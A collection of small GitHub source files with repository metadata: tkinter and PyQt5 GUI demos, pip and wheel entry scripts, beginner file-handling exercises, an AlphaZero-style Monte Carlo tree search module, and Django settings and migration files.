#etiket.pack()
#
#düğme = tk.Button(text='Çık', command=çıkış)
#düğme.pack()
#
#pencere.protocol('WM_DELETE_WINDOW', çıkış)
#
#pencere.mainloop()
import tkinter as tk
class Pencere(tk.Tk): # we inherit from the Tk class
    def __init__(self):
        #super().__init__()
        tk.Tk.__init__(self) # super().__init__() would suffice with single inheritance; with multiple bases, calling each base __init__ explicitly lets us choose the order, whereas super() follows the MRO of the bases as listed
        self.protocol('WM_DELETE_WINDOW', self.çıkış)
        self.etiket = tk.Label(text='Merhaba Zalim Dünya')
        self.etiket.pack()
        self.düğme = tk.Button(text='Çık', command=self.çıkış)
        self.düğme.pack()
    def çıkış(self):
        # farewell sequence: update label, disable the button, then destroy
        # the window after 2000 ms
        self.etiket['text'] = 'Elveda zalim dünya...'
        self.düğme['text'] = 'Bekleyin...'
        self.düğme['state'] = 'disabled'
        self.after(2000, self.destroy)
pencere = Pencere()
pencere.mainloop() | [
"noreply@github.com"
] | harunresit.noreply@github.com |
7f1582310fce8bb63a60feb0308e0de86eb8ba7a | 4dc81896d35f7bd9c7df1cb976432d52d3f0b051 | /dialogs/QDialogDemo.py | 0735b8a918d11a1e30bea52bf8394bc40488e654 | [] | no_license | scholar-he/PyQt5 | 8cbd7a76cc55c812c97c6522700474b3548d1ff8 | 78e5739032cfa5faa8177a5f380ccb35502603ae | refs/heads/master | 2020-08-02T17:59:04.286178 | 2019-10-27T14:04:09 | 2019-10-27T14:04:09 | 211,456,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | #! /usr/bin/python
# -*-coding:utf-8-*-
"""
@Author: Tony 2513141027
@Date: 2019/10/5 21:20
@Description: 对话框(QDialog)
QMessageBox
QColorDialog
QFileDialog
QFontDialog
QInputDialog
QMainWindow
QWidget
QDialog
"""
import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
class QDialogDemo(QMainWindow):
    """Main window with a button that opens an application-modal QDialog."""
    def __init__(self):
        super(QDialogDemo, self).__init__()
        self.initUI()
    def initUI(self):
        # window title, size, and the button that triggers the dialog
        self.setWindowTitle("QDialog案例")
        self.resize(300, 200)
        self.button = QPushButton(self)
        self.button.setText("弹出对话框")
        self.button.move(50, 50)
        self.button.clicked.connect(self.showDialog)
    def showDialog(self):
        # build a modal dialog with a single button that closes it
        dialog = QDialog()
        button = QPushButton("确定", dialog)
        button.clicked.connect(dialog.close)
        button.move(50, 50)
        dialog.setWindowTitle("对话框")
        dialog.setWindowModality(Qt.ApplicationModal)
        dialog.exec()
if __name__ == '__main__':
app = QApplication(sys.argv)
main = QDialogDemo()
main.show()
sys.exit(app.exec_()) | [
"2513141027@qq.com"
] | 2513141027@qq.com |
deb2abd5367b7ec66c36a0df80d45c3cd37333be | 501779828e79d69e60ed09786fbfdd6671101de1 | /venv/Scripts/pip-script.py | fd098e67c7f923b3ac7849064c057c6cbaae7e13 | [] | no_license | shi-wal/face-detection-using-cv | 24855fb40e699aff2ab18d688c6f340f612457e0 | c940590c0dedcf41d98f761f1970cb5a215772fa | refs/heads/main | 2023-02-13T07:02:19.270725 | 2021-01-13T11:52:58 | 2021-01-13T11:52:58 | 329,284,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!C:\Users\Shivii\PycharmProject\FaceDetection\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip')()
)
| [
"shivangiagrawal667@gmail.com"
] | shivangiagrawal667@gmail.com |
1c837a755029ecaa022cf1e10f5a55ee99df4306 | 6c9b128e4a3187b64341aa21111282d8ebadd156 | /env/bin/wheel | 396e6d35631483bb0fab12519ee61ccf9fe4299d | [] | no_license | sagarkunayak/school | a6643a5849ba904477d3cb3308e2c7ac6dbac340 | 9b9915965189c7089c143961bb0e8642d4fa7a59 | refs/heads/main | 2023-04-06T08:56:18.646744 | 2021-04-17T16:52:22 | 2021-04-17T16:52:22 | 358,930,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | #!/Users/sagarkumarnayak/Downloads/school_learning_management-main/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"sagarkumarnayak@Sagars-MacBook-Air.local"
] | sagarkumarnayak@Sagars-MacBook-Air.local | |
eef24096c5c29099532f705e4db5d31d6c92c56b | 53aca4b34dfed272ac18d19402e0eacc26b3d1c5 | /Python :: semi-advanced/files and streams/3_files_with_context_manager.py | 91ea54039b7e1e2df8014e7dd97059a9d603ff11 | [] | no_license | tenzo/python_course | 93f0dbd6cc9b85ad9c9d7bcee64aef880816e729 | db29b7fb848f62e42b0e06d6a3d97b4f63681e85 | refs/heads/master | 2022-11-27T14:24:53.994735 | 2020-06-06T12:13:22 | 2020-06-06T12:14:01 | 269,942,976 | 0 | 1 | null | 2022-11-24T05:38:22 | 2020-06-06T10:13:28 | Python | UTF-8 | Python | false | false | 414 | py | if __name__ == '__main__':
# preferowanym sposobem otwierania pliku w pythonie jest użycie managera kontekstu:
with open('python_zen.txt') as file:
print(file.read())
print("W tym miejscu plik jest jeszcze otwarty")
print("Dalsza część programu")
# zapis:
with open('some_text.txt', 'w') as file:
file.write('Ala ma kota\n')
file.write('Kot ma czołg\n')
| [
"tenzo.dev@gmail.com"
] | tenzo.dev@gmail.com |
9563088898f41821a07e371b8548c06e7556c562 | 6cce4c33548d71b6c780f6fbdafdde9f02de9a00 | /03-FileHandling/FH13.py | aca2afadfc321617b937ed8017896dbdb841faa1 | [] | no_license | DamianDamian-Domin/pp1 | 46b9cda0dbcb024ea6234ca999a8d3a61af4948c | 32d25701b9974752aee7fed9fc9e35cc979c1a2f | refs/heads/master | 2020-08-20T17:37:46.831228 | 2020-01-29T18:23:59 | 2020-01-29T18:23:59 | 216,049,530 | 2 | 0 | null | 2019-10-18T15:03:25 | 2019-10-18T15:03:25 | null | UTF-8 | Python | false | false | 199 | py | '''
program
'''
# the six numbers to write out, one per line
tablica = [32, 16, 5, 8, 24, 7]
index = -1
with open('liczby.txt', 'w') as file:
    # range(-1, 5) yields six values, so every element of tablica is written
    for x in range(-1, 5):
        index = index + 1
        file.write(str(tablica[index]) + "\n")
| [
"damian.domin334@gmail.com"
] | damian.domin334@gmail.com |
0171b167d839283f68195e743403d47603fa9f35 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_004/ch15_2019_03_15_12_37_22_879295.py | 63ff08a3f9db6f997d4660dad3874728fbdd779e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | import math
def volume_da_pizza(z, a):
    """Volume of a cylindrical pizza with radius z and thickness a: pi*z^2*a."""
    return math.pi * z ** 2 * a
| [
"you@example.com"
] | you@example.com |
be79a731cff3c1f31405abfcd8ba88fc1b6f2881 | ffcfd600e45431246b57e39ad33696660e8e341d | /mcts_cyclic_ref.py | 2475d047849e678c9d2a0a5675ea252ffc516a2b | [] | no_license | kwtsangg/alphazeropy | 372a5ba3bc2da806de25f8bd8afce19f3a714746 | 0fe6d0dbf9376de6b9d5f9704dbbad97dd2f190d | refs/heads/master | 2023-01-24T10:05:13.949032 | 2023-01-08T21:02:45 | 2023-01-08T21:02:45 | 138,353,092 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,876 | py | #!/usr/bin/env python
from __future__ import print_function # to prevent Py2 from interpreting it as a tuple
__file__ = "mcts_cyclic_ref.py"
__author__ = "Ka Wa Tsang"
__copyright__ = "Copyright 2018"
__version__ = "1.0.1"
__email__ = "kwtsang@nikhef.nl"
__date__ = "2018-Feb-15"
Description=""" To make MCTS by PUCT algorithm
"""
#===============================================================================
# Module
#===============================================================================
import numpy as np
import sys
sys.setrecursionlimit(15000)
import copy
import time
#===============================================================================
# Functions
#===============================================================================
def softmax(x):
  """Numerically stable softmax: shift by the max before exponentiating."""
  shifted = np.exp(x - np.max(x))
  return shifted / shifted.sum()
#===============================================================================
# Main
#===============================================================================
class TreeNode:
  """A node of the MCTS search tree.

  Tracks the visit count N, the mean action-value Q and the prior
  probability P assigned by the policy network, plus a mapping from
  actions to child nodes.
  """
  def __init__(self, parent, prior_p):
    self.parent = parent   # parent TreeNode, or None for the root
    self.children = {}     # action -> child TreeNode
    self.N = 0             # visit count
    self.Q = 0             # mean action-value seen through this node
    self.P = prior_p       # prior probability of reaching this node
  def select(self, c_puct):
    """Greedily pick the (action, child) pair with the largest Q + U."""
    return max(self.children.items(), key=lambda kv: kv[1].get_QplusU(c_puct))
  def get_QplusU(self, c_puct):
    """PUCT score: exploitation term Q plus exploration bonus U."""
    return self.get_U(c_puct) + self.Q
  def get_U(self, c_puct):
    """Exploration bonus; large for high-prior, rarely visited children."""
    return c_puct * self.P * np.sqrt(self.parent.N) / (1. + self.N)
  def expand(self, policy, legal_action):
    """Create one child per legal action that is not expanded yet.

    policy[0] is a 2-D array of move probabilities over the board;
    policy[1] is the probability of the special string move "PASS".
    """
    for action in legal_action:
      if action in self.children:
        continue
      prior = policy[1] if isinstance(action, str) else policy[0][action]
      self.children[action] = TreeNode(self, prior)
  def update(self, leaf_value):
    """Fold one leaf evaluation into this node's running statistics."""
    self.N += 1
    self.Q += (leaf_value - self.Q) / self.N
  def update_parent_recursively(self, leaf_value):
    """Update this node and, with alternating sign, all of its ancestors."""
    if self.parent is not None:
      self.parent.update_parent_recursively(-leaf_value)
    self.update(leaf_value)
  def is_root(self):
    return self.parent is None
  def is_leaf(self):
    return len(self.children) == 0
class MCTS:
  """Monte-Carlo tree search guided by a policy/value network (PUCT)."""
  def __init__(self, policy_value_fn, c_puct=10., n_rollout=100, s_thinking=None, use_thinking=False):
    """
    Input:
      policy_value_fn : the predict function in the model class. eg. AlphaZero_Gomoku.predict(,False)
      c_puct          : exploration constant in the PUCT formula
      n_rollout       : rollouts per move (used when use_thinking is False)
      s_thinking      : wall-clock seconds per move (used when use_thinking is True)
    """
    self.policy_value_fn = policy_value_fn
    self.root_node = TreeNode(None, 1.0)
    self.c_puct = float(c_puct)
    self.n_rollout = int(n_rollout)
    self.s_thinking = s_thinking
    self.use_thinking = use_thinking
  def rollout(self, Board, epsilon=0.25, dirichlet_param=0.1):
    """
    a rollout from the root node to the leaf node (may or may not be the end of the game)
    CAUTION: This function will modify the input Board. So a copy.deepcopy must be provided.
    """
    node = self.root_node
    while not node.is_leaf():
      # greedily select next move according to Q+U
      action, node = node.select(self.c_puct)
      Board.move(action)
    # check whether the game ends
    Board.check_winner()
    if Board.winner[0]:
      if Board.winner[1] == 0:
        # if draw game
        leaf_value = 0.
      else:
        # value from the perspective of the player to move at the leaf
        leaf_value = 1. if Board.winner[1] == Board.current_player else -1.
    else:
      # a random dihedral transformation is performed before feeding into AlphaZero
      rotation_order = np.random.choice(Board.rotation_symmetry)
      reflection_order = np.random.choice(Board.reflection_symmetry)
      feature_box = Board.get_current_player_feature_box()
      for i in range(len(feature_box)):
        feature_box[i] = self.dihedral_transformation(feature_box[i], rotation_order, reflection_order)
      policy_value = self.policy_value_fn(np.array([feature_box]), raw_output = False)
      policy = list(policy_value[0][:-1])
      # undo the transformation so the policy lines up with the real board
      policy[0] = self.dihedral_transformation(policy[0], rotation_order, reflection_order, inverse=True)
      # add Dirichlet Noise to encourage exploration
      noise = np.random.dirichlet(dirichlet_param*np.ones(Board.height*Board.width+1))
      policy[0] = policy[0]*(1.-epsilon) + epsilon*noise[:-1].reshape(Board.height, Board.width)
      policy[1] = policy[1]*(1.-epsilon) + epsilon*noise[-1]
      # expand
      leaf_value = policy_value[0][-1]
      node.expand(policy, Board.get_legal_action())
    # Update the leaf and its ancestors
    node.update_parent_recursively(-leaf_value)
  def dihedral_transformation(self, feature_plane, rotation_order, reflection_order, inverse=False):
    """
    rotation and reflection are not commutative. Here I decided to first perform reflection.
    """
    if not inverse:
      if reflection_order:
        result = np.rot90(np.fliplr(feature_plane), rotation_order)
      else:
        result = np.rot90(feature_plane, rotation_order)
    else:
      # inverse transform: undo the rotation first, then the reflection
      if reflection_order:
        result = np.fliplr(np.rot90(feature_plane, -rotation_order))
      else:
        result = np.rot90(feature_plane, -rotation_order)
    return result
  def get_move_probability(self, Board, temp=1., epsilon=0.25, dirichlet_param=0.1):
    """
    Input:
      Board: current board
      temp : T to control level of exploration. temp = 1. or high encourages exploration while temp = 1e-3 or small means to select strongest move.
    Output:
      move probability on board
    """
    if self.use_thinking:
      # think for a fixed wall-clock budget
      start_time = time.time()
      while time.time()-start_time < self.s_thinking:
        Board_deepcopy = copy.deepcopy(Board)
        self.rollout(Board_deepcopy, epsilon, dirichlet_param)
    else:
      # think for a fixed number of rollouts
      for i in range(self.n_rollout):
        Board_deepcopy = copy.deepcopy(Board)
        self.rollout(Board_deepcopy, epsilon, dirichlet_param)
    move_N_Q = [(move, node.N, node.Q) for move, node in self.root_node.children.items()] # transform a dictionary to tuple
    move, N, Q = list(zip(*move_N_Q)) # unzip the tuple into move and N
    if temp:
      probs = softmax(np.log(N)/temp + 1e-9)
    else:
      # temp == 0: deterministically pick the most-visited move
      probs = np.zeros(len(N))
      probs[np.argmax(N)] = 1.
    return move, probs, Q
  def update_with_move(self, last_move):
    """
    After the opponent player moves, the child node corresponding to the played action becomes the new root node;
    the subtree below this child is retained along with all its statistics, while the remainder of the tree is discarded
    """
    # Moves are either board coordinates (list/tuple) or the string "PASS".
    # tuple("PASS") would give ('P','A','S','S'), never match a child key
    # and needlessly discard the retained subtree, so only coerce
    # non-string moves.
    if not isinstance(last_move, str):
      last_move = tuple(last_move)
    if last_move in self.root_node.children:
      self.root_node = self.root_node.children[last_move]
      self.root_node.parent = None
    else:
      self.root_node = TreeNode(None, 1.0)
  def reset(self):
    """Discard the whole tree and start over from a fresh root."""
    self.root_node = TreeNode(None, 1.0)
class MCTS_player:
  """Game-playing agent that chooses moves with network-guided MCTS."""
  def __init__(self, policy_value_fn, c_puct = 5., n_rollout = 100, epsilon = 0.25, dirichlet_param = 0.1, temp = 1., name = "", s_thinking = None, use_thinking = False):
    self.name = str(name)
    self.nature = "mcts"
    self.policy_value_fn = policy_value_fn
    self.c_puct = float(c_puct)
    self.n_rollout = int(n_rollout)
    self.epsilon = float(epsilon)
    self.dirichlet_param = float(dirichlet_param)
    self.temp = float(temp)
    # s_thinking defaults to None (no time budget); float(None) would raise
    # TypeError on the default construction path, so only convert when a
    # value was actually given.
    self.s_thinking = float(s_thinking) if s_thinking is not None else None
    self.use_thinking = use_thinking
    self.MCTS = MCTS(self.policy_value_fn, c_puct=self.c_puct, n_rollout=self.n_rollout, s_thinking=self.s_thinking, use_thinking=self.use_thinking)
  def get_move(self, Board, **kwargs):
    """
    Pick a move for the current position by sampling the MCTS visit counts.
    epsilon [0,1] is to control how much dirichlet noise is added for exploration. 1 means complete noise.
    When is_return_probs is truthy, also return the full search statistics
    laid out as height*width+1 vectors (the last slot being "PASS").
    """
    epsilon = float(kwargs.get('epsilon', 0.25))
    dirichlet_param = float(kwargs.get('dirichlet_param', 0.3))
    is_return_probs = kwargs.get('is_return_probs', False)
    temp = float(kwargs.get('temp', self.temp))
    is_analysis = kwargs.get('is_analysis', False)
    if Board.get_legal_action():
      move, probs, Q = self.MCTS.get_move_probability(Board, temp)
      # sample a move according to the visit-count distribution
      selected_move_index = np.random.choice(np.arange(len(move)), p=probs)
      selected_move = move[selected_move_index]
      selected_move_probs = probs[selected_move_index]
      selected_move_value = Q[selected_move_index]
      # keep the chosen subtree for the next search
      self.MCTS.update_with_move(selected_move)
      if is_return_probs:
        return_probs = np.zeros(Board.height*Board.width+1)
        return_Q = np.zeros(Board.height*Board.width+1)
        for imove, iprobs, iQ in list(zip(move, probs, Q)):
          if imove == "PASS":
            return_probs[-1] = iprobs
            return_Q[-1] = iQ
          else:
            return_probs[imove[0]*Board.width+imove[1]] = iprobs
            return_Q[imove[0]*Board.width+imove[1]] = iQ
        if is_analysis:
          self.print_analysis(return_probs[:-1].reshape(Board.height, Board.width), selected_move_probs, return_Q[:-1].reshape(Board.height, Board.width), selected_move_value)
        return selected_move, return_probs, selected_move_probs, return_Q, selected_move_value
      else:
        return selected_move
    else:
      print("No legal move anymore. It should not happen because the game otherwise ends")
  def update_opponent_move(self, opponent_last_move, children_id=None):
    """
    Advance the internal tree past the opponent's move.
    children_id is unused but needed.
    """
    self.MCTS.update_with_move(opponent_last_move)
  def reset(self):
    """Forget the current search tree (start of a new game)."""
    self.MCTS.reset()
  def print_analysis(self, return_probs_reshaped, selected_move_prob, return_Q_reshaped, selected_move_value):
    """Pretty-print the search statistics for human inspection."""
    print("")
    print("The value at the move is")
    print(return_Q_reshaped)
    print("The resultant policy is")
    print(return_probs_reshaped)
    print("The value of the chosen move = ", selected_move_value)
    print("The probability of the chosen move = ", selected_move_prob)
| [
"kwtsang@nikhef.nl"
] | kwtsang@nikhef.nl |
1c6dd289e98ae42ebdf861b133e0e659659202dc | d00d8a7fcfc567e0c761460e27313e085540ea1b | /ansible/roles/job_tracker-setup/files/job_tracker/__main__.py | 077c93755ce0aafdd65a29a0b7d6ac8befd3aa1d | [] | no_license | chrigifrei/job_tracker | 70bf6aa218131f944bed1dcd248bdd0fb68543b4 | 71d4ab8d9c3fcf6e346e121d5dea24989ee6b974 | refs/heads/master | 2021-01-20T05:15:39.365582 | 2017-08-25T16:56:45 | 2017-08-25T16:56:45 | 62,312,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | #!/usr/bin/env python
# Import job_tracker purely for its side effects; tolerate its absence.
try:
    import job_tracker
except ImportError:
    # Narrowed from a bare `except:`, which also hid real defects inside
    # job_tracker itself (SyntaxError, NameError, ...). Only a genuinely
    # missing package is ignored now.
    pass
| [
"chrigi.frei@gmail.com"
] | chrigi.frei@gmail.com |
1a5d5e949e7a40f1281ffefdc9c70f374f8a646e | bc355f7d1f4e60dc648ffaddec55c51b6484204e | /interview_prep/settings/production.py | 581c7758889fa7483e21a29b98a739d45fcfc6ec | [] | no_license | adrind/job-lab-interview | ce7709ef7c2089b0b6aa7713a68ee2fef75dde85 | f7385e12b5c60cc2ecf339c799b121893c38a67d | refs/heads/master | 2022-12-11T09:16:02.824061 | 2017-08-18T19:16:09 | 2017-08-18T19:16:09 | 100,575,053 | 0 | 0 | null | 2022-12-08T00:44:29 | 2017-08-17T07:33:11 | Python | UTF-8 | Python | false | false | 785 | py | from __future__ import absolute_import, unicode_literals
from .base import *

# Parse database configuration from $DATABASE_URL
import dj_database_url
import os

# Snapshot of the process environment; a missing key below fails loudly.
env = os.environ.copy()

# The production secret key must come from the environment.
SECRET_KEY = env['SECRET_KEY']

DATABASES['default'] = dj_database_url.config()

# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

# Allow all host headers
ALLOWED_HOSTS = ['*']

# Static file storage backend (WhiteNoise, gzip + manifest).
STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'

# django-compressor: pre-compress CSS offline at deploy time.
COMPRESS_OFFLINE = True
COMPRESS_CSS_FILTERS = [
    'compressor.filters.css_default.CssAbsoluteFilter',
    'compressor.filters.cssmin.CSSMinFilter',
]
COMPRESS_CSS_HASHING_METHOD = 'content'

DEBUG = False

# Optional machine-local overrides; it is fine for .local to be absent.
try:
    from .local import *
except ImportError:
    pass
| [
"adrienne@codeforamerica.org"
] | adrienne@codeforamerica.org |
4ca9f354434ea2b8ed4dd2b30525c00bb6fcc22a | ffed3df7a2545c4b20d510b4c6679d2504fe830e | /curso python/ARAdmin/manage.py | 8eda57533eec644f1c3ef8d57e53430979bd5e93 | [] | no_license | josejimenez1931056/AdminWebAR | 19eef4ca959d3ff3aa2bfcf65d5eb6e6baee5219 | 9f27dbc5b8b2cdeceb4fe97e07d5a53c4b15ccec | refs/heads/master | 2023-01-10T19:27:34.544308 | 2020-02-01T23:41:44 | 2020-02-01T23:41:44 | 237,681,965 | 0 | 0 | null | 2023-01-07T14:22:28 | 2020-02-01T21:42:38 | Python | UTF-8 | Python | false | false | 627 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Configure the settings module and dispatch to Django's CLI."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ARAdmin.settings')
    try:
        # Imported lazily so a missing Django yields the helpful message below.
        from django.core.management import execute_from_command_line as _dispatch
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    _dispatch(sys.argv)


if __name__ == '__main__':
    main()
| [
"luis.joshep@hotmail.com"
] | luis.joshep@hotmail.com |
26ea2eac2297c38d86977e917dae29fbde0eb86f | 82f5ec2f9ad8ddfa3f4a6bb5be95cd6523c1dfdf | /course1/week3/dot_product.py | a8ceffe50b2671204734cd8002ed632c3eea535d | [] | no_license | AlexanderOnbysh/algorithmic-toolbox | 051bca6313fe0c340df3d13af1a58a73d405869e | 87ff4d2c68e0901e1a650916591095e83d4ea8b4 | refs/heads/master | 2020-03-20T17:55:42.131707 | 2018-06-24T12:32:51 | 2018-06-22T19:00:00 | 137,568,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Uses python3
import sys
def max_dot_product(a, b):
    """Return the maximum dot product achievable by pairing elements of a and b.

    Sorting both sequences and multiplying position-wise pairs the largest
    values together (and the most negative together), which is optimal by
    the rearrangement inequality.
    """
    return sum(x * y for x, y in zip(sorted(a), sorted(b)))
if __name__ == '__main__':
    # Input format on stdin: n, then the n values of a, then the n values of b.
    input = sys.stdin.read()  # NOTE(review): shadows the builtin input()
    data = list(map(int, input.split()))
    n = data[0]
    a = data[1:(n + 1)]
    b = data[(n + 1):]
    print(max_dot_product(a, b))
| [
"alexandr.onbysh@ring.com"
] | alexandr.onbysh@ring.com |
45ea3e7d8004d23bd4b5fe78a403b5515a80826a | 42000e14d25ce3de5b9ba24e3399e67bf88c4ad1 | /Level_Three/ProTwo/AppTwo/migrations/0001_initial.py | db9703f5f9d755c7f363b452bdc1ccaea87e2c26 | [] | no_license | cdunn6754/Django_Projects | 0528b3263e2762d0e872686ec5f00a40f3730851 | 545d4e73f05969d1277cacaab2042787676b7e73 | refs/heads/master | 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the `User` table with
    # first/last name and email columns. Avoid hand-editing generated
    # migrations except to squash them deliberately.

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=264)),
                ('last_name', models.CharField(max_length=264)),
                ('email', models.EmailField(max_length=264)),
            ],
        ),
    ]
| [
"cdunn6754@gmail.com"
] | cdunn6754@gmail.com |
cdcc1dcd5293dd7d91c547e9c8cf2f57eefcb5b5 | 9f71c97f3558e9ca21a9ae702826da613f7672fc | /ex19.py | 1181e0623b1c2e619e7b179665c471d30af3c76c | [] | no_license | kadiriswathi/loops | b9f903c8548360b3531de55381bfbf790e7c0c76 | 25f600ed95d174ecf997cdc44aed3e52efbe4042 | refs/heads/master | 2020-04-04T18:48:32.729319 | 2018-11-05T07:53:38 | 2018-11-05T07:53:38 | 156,179,964 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | sum=0
# Print the running totals 1, 3, 6, ..., 55 of the integers 1..10.
for x in range(1,11):
    sum = sum + x  # NOTE(review): `sum` shadows the builtin sum(); consider renaming to `total`
    print(sum)
| [
"swthkadiri@gmail.com"
] | swthkadiri@gmail.com |
fefaea12b90a2ebdecfd66f70e2b87301c0a2b52 | 2023fa470a2df0c5feda1f57c87752c80366de83 | /01_基础/cal.py | 6b68252d04f9846bd3559237e621a9c39ef91051 | [] | no_license | lmmProject/python_01 | 73d53b2b65cc56db936de765b5b9472dc856f59a | f51d24fb054e970c847e448b6ff176b851e1f9fc | refs/heads/master | 2020-03-18T06:18:51.455204 | 2018-11-10T10:05:43 | 2018-11-10T10:05:43 | 134,387,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | import math # 导入 math 模块
# Variable definition and a conditional statement
a = 100
if a >= 0:
    print(math.pow(2, 32))
else:
    print(-a/2)

# Dynamic typing: a name can be rebound to a value of a different type
a = a + 10.0
print(a)

a = 'abc'
b = a
a = 'xyz'
print(b)

# Integer floor division // always yields an integer, even when inexact
print(10 // 3)
print(10 % 3)

# ASCII encoding: uppercase 'A' is 65, lowercase 'z' is 122
print("获取字符串的整数表示ord():")
print(ord('a'))
print(chr(20013))

# One Chinese character usually occupies 3 bytes after UTF-8 encoding
print(len('中'.encode('utf-8')))

# The % operator is used to format strings
print('%2d-%02d' % (3,1))
print('%.2f' % 3.1425926)
r = 85/72
print('%.1f%%' % r) | [
"752634866@qq.com"
] | 752634866@qq.com |
92e405b5c5cb9c96d343d605c55c0818cfd3654b | 512f774fc3545e47cfaf6a2806583702cb09ed9b | /mysite2/mysite2/settings.py | d8102e653e8ab4f25a3120dd1d7dc3fea4ed97f5 | [] | no_license | young961227/Django | b6d25a709a461ef9256ca60f364dda05b4dfb35c | 108653133232ff0a96cf4b7061884d659aaf7f63 | refs/heads/master | 2023-08-04T15:50:04.726076 | 2020-05-22T12:30:42 | 2020-05-22T12:30:42 | 265,178,581 | 0 | 0 | null | 2021-09-22T19:02:34 | 2020-05-19T07:37:59 | Python | UTF-8 | Python | false | false | 3,126 | py | """
Django settings for mysite2 project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control — rotate it and
# load it from the environment before any deployment.
SECRET_KEY = 'a6^mw!6mc=1#j$mn^7_9g4z$#xi!e*wht&onml*6kw6=4$1%b%'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'news.apps.NewsConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'mysite2.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'mysite2.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
| [
"yohesa@nate.com"
] | yohesa@nate.com |
